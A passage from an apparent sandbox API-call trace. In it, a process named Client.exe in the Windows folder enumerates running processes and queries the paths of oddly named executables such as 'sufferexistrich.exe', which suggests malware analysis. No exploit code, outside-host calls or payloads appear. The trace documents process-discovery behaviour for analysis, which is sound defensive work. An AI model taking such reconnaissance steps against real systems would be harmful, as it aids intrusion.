[0292.641] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0292.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x170 [0292.641] GetPriorityClass (hProcess=0x170) returned 0x20 [0292.641] CloseHandle (hObject=0x170) returned 1 [0292.641] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x940) returned 0x170 [0292.641] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Program Files\\Windows Journal\\sufferexistrich.exe", lpdwSize=0x18fd44) returned 1 [0292.644] CloseHandle (hObject=0x170) returned 1 [0292.644] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0292.649] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.650] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.651] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.652] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.653] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.653] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.654] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.655] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.656] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.657] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0292.658] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.659] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.660] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.660] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.661] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.662] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.663] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.664] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.665] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.666] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.667] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0292.668] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.668] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0292.669] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.670] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.671] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0292.672] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.673] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x804, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.674] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="sufferexistrich.exe")) returned 1 [0292.674] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x390) returned 0x178 [0292.675] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x91f710, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe")) returned 0x0 [0292.731] CloseHandle (hObject=0x178) returned 1 [0292.731] CloseHandle (hObject=0x170) returned 1 [0292.731] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x390) returned 0x170 [0292.731] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\explorer.exe", lpdwSize=0x18faf0) returned 1 [0292.733] CloseHandle (hObject=0x170) returned 1 [0292.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0292.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0292.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x9d92a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\explorer.exe.exee", lpUsedDefaultChar=0x0) returned 23 [0292.733] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x940) returned 0x170 [0292.733] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files\\Windows Journal\\sufferexistrich.exe", lpdwSize=0x18fd48) returned 1 [0292.736] CloseHandle (hObject=0x170) returned 1 [0292.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Windows Journal\\sufferexistrich.exe", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0292.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Windows Journal\\sufferexistrich.exe", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0292.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Windows Journal\\sufferexistrich.exe", cchWideChar=52, lpMultiByteStr=0xa05598, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Windows Journal\\sufferexistrich.exe03 ", lpUsedDefaultChar=0x0) returned 52 [0292.736] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x940) returned 0x170 [0292.737] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Program Files\\Windows Journal\\sufferexistrich.exe", lpdwSize=0x18fd40) returned 1 [0292.740] CloseHandle (hObject=0x170) returned 1 [0292.740] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x940) returned 0x170 [0292.740] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files\\Windows Journal\\sufferexistrich.exe", lpdwSize=0x18fd48) returned 1 [0292.745] CloseHandle (hObject=0x170) returned 1 [0292.745] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x940) returned 0x170 [0292.745] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files\\Windows Journal\\sufferexistrich.exe", lpdwSize=0x18fd48) returned 1 [0292.748] CloseHandle (hObject=0x170) returned 1 [0292.748] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0292.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x948) returned 0x170 [0292.748] GetPriorityClass (hProcess=0x170) returned 0x20 [0292.748] CloseHandle (hObject=0x170) returned 1 [0292.748] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x948) returned 0x170 [0292.748] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Program Files\\Common Files\\have return physical.exe", lpdwSize=0x18fd44) returned 1 [0292.752] CloseHandle (hObject=0x170) returned 1 [0292.752] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0292.757] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.758] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.759] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.760] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.760] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.761] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.762] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.763] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.764] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.765] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0292.766] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.767] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.768] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.768] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.769] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.770] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.771] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.771] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0293.063] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.065] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0293.066] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0293.067] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.068] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0293.069] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0293.070] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.071] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0293.072] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.073] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x804, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.074] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="sufferexistrich.exe")) returned 1 [0293.075] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="have return physical.exe")) returned 1 [0293.075] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x390) returned 0x178 [0293.076] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x91f710, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe")) returned 0x0 [0293.076] CloseHandle (hObject=0x178) returned 1 [0293.076] CloseHandle (hObject=0x170) returned 1 [0293.076] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x390) returned 0x170 [0293.076] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\explorer.exe", lpdwSize=0x18faf0) returned 1 [0293.077] CloseHandle (hObject=0x170) returned 1 [0293.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0293.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0293.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x9d92a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\explorer.exe.exee", lpUsedDefaultChar=0x0) returned 23 [0293.078] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x948) returned 0x170 [0293.078] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files\\Common Files\\have return physical.exe", lpdwSize=0x18fd48) returned 1 [0293.080] CloseHandle (hObject=0x170) returned 1 [0293.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\have return physical.exe", cchWideChar=54, lpMultiByteStr=0x0, 